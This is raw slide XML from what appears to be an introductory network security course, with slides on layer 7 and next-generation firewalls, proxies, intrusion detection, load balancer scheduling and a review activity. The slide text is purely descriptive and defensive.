            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996204" y="2141538"/>
            <a:ext cx="5509993" cy="4487862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9086427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1C997-8966-2130-D9A1-A5CE14D93969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Layer 7 Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B71104C0-D344-90F0-8175-C8A089272456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A layer 7 firewall can inspect the headers and payload of application-layer packets. One key feature is to verify the application protocol matches the port because malware can try to send raw TCP data over port 80 just because port 80 is open, for instance. As another example, a web application firewall could analyze the HTTP headers and the webpage formatting code present in HTTP packets to identify strings that match a pattern in its threat database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application-aware firewalls have many different names, including application layer gateway, stateful multilayer inspection, and deep packet inspection. Application- aware devices have to be configured with separate filters for each type of traffic (HTTP and HTTPS, SMTP/POP/IMAP, FTP, and so on).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19660934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9A9E7-8CDB-0A45-0CC1-782037165296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Proxy Servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76CD8A91-9CE0-D72E-6C86-CF21E00FAF52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279402" y="1885346"/>
            <a:ext cx="4995334" cy="3649134"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A firewall that performs application layer filtering is likely implemented as a proxy. Where a network firewall only accepts or blocks traffic, a proxy server works on a store-and-forward model. The proxy deconstructs each packet, performs analysis, then rebuilds the packet and forwards it on, providing it conforms to the rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Forward Proxy Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reverse Proxy Servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 364">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D72F330-B264-F779-7531-60C1F057F03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146583" y="969984"/>
            <a:ext cx="4529886" cy="2843699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 365">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7870F7B9-3542-A432-B727-8065770161EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146583" y="4142877"/>
            <a:ext cx="4504265" cy="2569671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2158228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3AF79-BAC0-ADB7-6080-8AB0218B44B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Information Security Competencies</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1674C9C-537C-6C31-0C9C-99B7E743F1F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2097088"/>
            <a:ext cx="9905999" cy="4557711"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>IT professionals working in a role with security responsibilities must be competent in a wide range of disciplines, from network and application design to procurement and human resources (HR). The following activities might be typical of such a role:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Participate in risk assessments and testing of security systems and make recommendations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Specify, source, install, and configure secure devices and software.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Set up and maintain document access control and user privilege profiles.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Monitor audit logs, review user privileges, and document access controls.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Manage security-related incident response and reporting.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Create and test business continuity and disaster recovery plans and procedures.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Participate in security training and education programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2332808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66565-6FED-A319-9E13-3FA7A6505407}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Intrusion Detection Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6455C3-91F9-DD76-9373-9A11FA95E53E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An intrusion system is a control that performs real-time analysis of either network traffic or system and application logs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Sensors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Intrusion Detection Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Intrusion Prevention Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 367">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8014D4CC-47FA-1193-8A59-99D953A75821}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821363" y="2494263"/>
            <a:ext cx="4995862" cy="2944211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21357259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D8B8-ACE6-AF73-66CF-429210DA0C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Next-Generation Firewalls and Unified Threat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10112E6-8775-E230-2BB4-AA49BD5468F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>While intrusion detection was originally produced as stand-alone software or appliances, its functionality quickly became incorporated into a new generation of firewalls. The original next-generation firewall (NGFW) was released in 2010 by Palo Alto. There is no official specification for what an NGFW can do, but the following features are typical:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layer 7 application-aware filtering, including inspection of Transport Layer Security (TLS) encrypted traffic.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integration with network directories, facilitating per-user or per-role content and time-based filtering policies, providing better protection against an insider threat.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intrusion prevention system (IPS) functionality. Next-generation firewalls can combine traditional firewall functionalities with advanced capabilities, such as deep packet inspection, intrusion prevention, and application awareness.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integration with cloud networking.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19492882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205A0-0AAF-60E9-E1BB-ECD9CAB63269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Load Balancers</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BA2AEC6-6537-D84F-3359-9332E42A5E89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two main types of load balancers:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Layer 4 load balancer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—basic load balancers make forwarding decisions on IP address and TCP/UDP port values, working at the transport layer of the OSI model.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Layer 7 load balancer (content switch)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—as web applications have become more complex, modern load balancers need to be able to make forwarding decisions based on application-level data, such as a request for a particular uniform resource locator (URL) web address or data types like video or audio streaming. This requires more complex logic, but the processing power of modern appliances is sufficient to deal with this.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 369">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9273A62-8798-CCAC-F115-E34F6B3D5EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821363" y="2731196"/>
            <a:ext cx="4995862" cy="2470346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1947653215"/>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E5C26B-5D05-B298-AEE6-15EA15567C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Scheduling</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F796F250-678D-70AA-9C14-1215D0573D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="10131425" cy="4461933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The scheduling algorithm is the code and metrics that determine which node is selected for processing each incoming request. The simplest type of scheduling is called round robin; this means picking the next node. Other methods include picking the node with the fewest connections or the best response time. Each method can be weighted using administrator-set preferences or dynamic load information, or both.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The load balancer must also use some type of heartbeat or health check probe to verify whether each node is available and under load or not. Layer 4 load balancers can only make basic connectivity tests while layer 7 appliances can test the application’s state and verify host availability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Source IP Affinity and Session Persistence</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a client device has established a session with a particular node in the server farm, it may be necessary to continue to use that connection for the duration of the session. Source IP or session affinity is a layer 4 approach to handling user sessions. It means that when a client establishes a session, it becomes stuck to the node that first accepted the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application-layer load balancer uses persistence to keep a client connected to a session. Persistence typically works by setting a cookie either on the node or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>injected by the load balancer. This can be more reliable than source IP affinity but requires the browser to accept the cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31382816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20955-E402-AF7D-D8C5-CB62CAD1D9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Web Application Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 370">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94794FF7-AEE4-6740-A28F-1DAA779DE806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054100" y="2141537"/>
            <a:ext cx="9652000" cy="4548981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16990584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4EC6E-3452-869C-CB19-F2668DF84590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Network Security Appliances</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278386FF-5A85-0BFD-3793-CE27F66EB251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True or False? As they protect data at the highest layer of the protocol stack, application-based firewalls have no basic packet filtering functionality. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A proxy server implements a gateway for employee web and email access and is regularly monitored for compromise. If any compromise is detected, the proxy must enter a fail state that prevents further access. What type of fail mode is required?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
